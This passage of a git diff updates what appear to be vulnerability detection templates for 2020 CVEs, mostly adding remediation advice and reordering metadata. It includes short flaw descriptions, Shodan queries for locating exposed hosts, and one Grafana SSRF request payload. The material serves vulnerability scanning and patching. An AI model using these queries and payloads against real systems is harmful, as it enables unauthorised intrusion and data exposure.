https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E - remediation: Upgrade to Apache Cocoon 2.1.13 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11991 cwe-id: CWE-611 epss-score: 0.80318 - cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* epss-percentile: 0.97888 + cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:"Apache Cocoon" vendor: apache product: cocoon + shodan-query: http.html:"Apache Cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe http: diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 21026718ef..5b617f70fe 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO. + remediation: | + Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 - https://wpvulndb.com/vulnerabilities/10184 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* epss-percentile: 0.46935 + cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: catchplugins product: catch_breadcrumb + framework: wordpress tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index eef15e7b6a..473e6bb038 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. + remediation: | + Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability. reference: - https://github.com/BeetleChunks/CVE-2020-12116 - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-12116 cwe-id: CWE-22 epss-score: 0.97355 - cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* epss-percentile: 0.99837 + cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zohocorp diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 594c94f4ad..8dc8aaf297 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://cerne.xyz/bugs/CVE-2020-12127 - https://www.wavlink.com/en_us/product/WL-WN530H4.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-12127 cwe-id: CWE-306 epss-score: 0.03579 - cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* epss-percentile: 0.90419 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn530h4_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2020,wavlink,exposure http: diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 5c8c5ffde9..4819141651 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + remediation: | + Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. reference: - https://blog.spookysec.net/onkyo-lfi - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-12447 cwe-id: CWE-22 epss-score: 0.01778 - cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* epss-percentile: 0.86487 + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 vendor: onkyo diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index d12ebfb8ff..ad2d30f4e3 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: - https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://nvd.nist.gov/vuln/detail/CVE-2020-12478 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-12478 cwe-id: CWE-306 epss-score: 0.00901 - cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* epss-percentile: 0.80707 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"teampass" verified: true + max-request: 1 vendor: teampass product: teampass + shodan-query: http.html:"teampass" tags: cve,cve2020,teampass,exposure,unauth http: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index d310dee4d4..e8b41142b1 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin. reference: - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 - https://nvd.nist.gov/vuln/detail/CVE-2020-12720 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-12720 cwe-id: CWE-306 epss-score: 0.88108 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* epss-percentile: 0.98245 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index bee84683e1..b6875bf25e 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file. + remediation: | + Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-12800 - https://github.com/amartinsec/CVE-2020-12800 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-12800 cwe-id: CWE-434 epss-score: 0.97435 - cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99908 + cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 + framework: wordpress tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive http: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index cbd62ae274..a6b3d6c3c4 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13117 @@ -14,14 +16,14 @@ info: cve-id: CVE-2020-13117 cwe-id: CWE-77 epss-score: 0.0785 - cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.93385 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.title:"Wi-Fi APP Login" + max-request: 1 vendor: wavlink product: wn575a4_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2020,wavlink,rce,oast,router http: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 444d6195b6..3c838fa841 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: - https://github.com/Submitty/Submitty/issues/5265 - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* epss-percentile: 0.60968 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rcos diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 24262b1a45..c15aba993a 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. + remediation: | + Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/InfoSec4Fun/CVE-2020-13158 - https://sourceforge.net/projects/artica-squid/files/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-13158 cwe-id: CWE-22 epss-score: 0.96791 - cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* epss-percentile: 0.99534 + cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: articatech diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 06abde52d8..89b1dd8a89 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. + remediation: | + Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-13167 cwe-id: CWE-78 epss-score: 0.97384 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.99866 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: netsweeper diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 6b9ed09cb1..7c147fd267 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + remediation: | + Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: - https://github.com/contentful/the-example-app.py/issues/44 - https://nvd.nist.gov/vuln/detail/CVE-2020-13258 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* epss-percentile: 0.72315 + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: contentful diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 1c98998f96..4c7271634f 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -6,13 +6,13 @@ info: severity: high description: | Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Upgrade to 6.3.4 or higher. reference: - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 - http://www.openwall.com/lists/oss-security/2020/06/03/4 - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html - remediation: Upgrade to 6.3.4 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 @@ -22,11 +22,11 @@ info: epss-percentile: 0.95791 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: grafana product: grafana shodan-query: title:"Grafana" - vendor: grafana - verified: true tags: cve,cve2020,grafana,ssrf http: @@ -36,6 +36,7 @@ http: - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 6bc2cd114b..db1237dbf3 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability. reference: - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-13405 cwe-id: CWE-306 epss-score: 0.00667 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.77128 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.html:"microweber" verified: true + max-request: 3 vendor: microweber product: microweber + shodan-query: http.html:"microweber" tags: cve,cve2020,microweber,unauth,disclosure http: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 50690fa1dc..1f3dd04976 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,3th1c_yuk1 severity: medium description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + remediation: | + Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability. reference: - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 - https://twitter.com/brutelogic/status/1483073170827628547 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* epss-percentile: 0.44064 + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bitrix24 diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 2ec9691af0..c65a25f842 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values. + remediation: | + Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches. reference: - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 - https://wordpress.org/plugins/acf-to-rest-api/#developers @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01923 - cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87118 + cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: acf_to_rest_api_project product: acf_to_rest_api + framework: wordpress tags: cve,cve2020,wordpress,plugin http: diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 32ff5451ff..5af75f43af 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00237 - cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* epss-percentile: 0.6108 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Extreme Management Center" verified: true + max-request: 1 vendor: extremenetworks product: extreme_management_center + shodan-query: title:"Extreme Management Center" tags: cve,cve2020,xss,extremenetworks http: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 4ad258414a..b151e7241b 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | Airflow's Experimental API prior 1.10.11 allows all API requests without authentication. + remediation: | + From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. reference: - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 - remediation: | - From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 cwe-id: CWE-1188 epss-score: 0.95404 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.99097 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + max-request: 1 vendor: apache product: airflow + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 7b3c1bf379..4d89be4108 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. + remediation: | + Secure the configuration file by restricting access permissions and implementing proper access controls. reference: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-13937 cwe-id: CWE-922 epss-score: 0.97402 - cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.99877 + cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 3761cc2185..2e073f4233 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -9,21 +9,21 @@ info: offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + remediation: Apache Unomi users should upgrade to 1.5.2 or later. reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 - https://nvd.nist.gov/vuln/detail/CVE-2020-13942 - http://unomi.apache.org./security/cve-2020-13942.txt - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E - remediation: Apache Unomi users should upgrade to 1.5.2 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13942 cwe-id: CWE-74,CWE-20 epss-score: 0.97533 - cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* epss-percentile: 0.99986 + cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 9cbbacbb20..573b402eb2 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + remediation: | + Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-13945 cwe-id: CWE-522 epss-score: 0.00522 - cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* epss-percentile: 0.73906 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 2ca346afea..309fc4e226 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format. + remediation: | + Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/10287 - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-14092 cwe-id: CWE-89 epss-score: 0.76739 - cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97784 + cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ithemes product: paypal_pro + framework: wordpress tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress http: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index ff855d73a3..5104f23a7f 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -6,27 +6,27 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 - https://github.com/go-gitea/gitea/pull/13058 - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - https://nvd.nist.gov/vuln/detail/CVE-2020-14144 - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script - remediation: Fixed in version 1.16.7. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 epss-score: 0.96765 - cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* epss-percentile: 0.99519 + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: - max-request: 7 - shodan-query: html:"Powered by Gitea Version" verified: true + max-request: 7 vendor: gitea product: gitea + shodan-query: html:"Powered by Gitea Version" tags: cve,cve2020,rce,gitea,authenticated,git,intrusive http: diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index ea377200f2..fd516899d0 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -5,6 +5,8 @@ info: author: x1m_martijn severity: medium description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names. + remediation: | + Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-71536 - 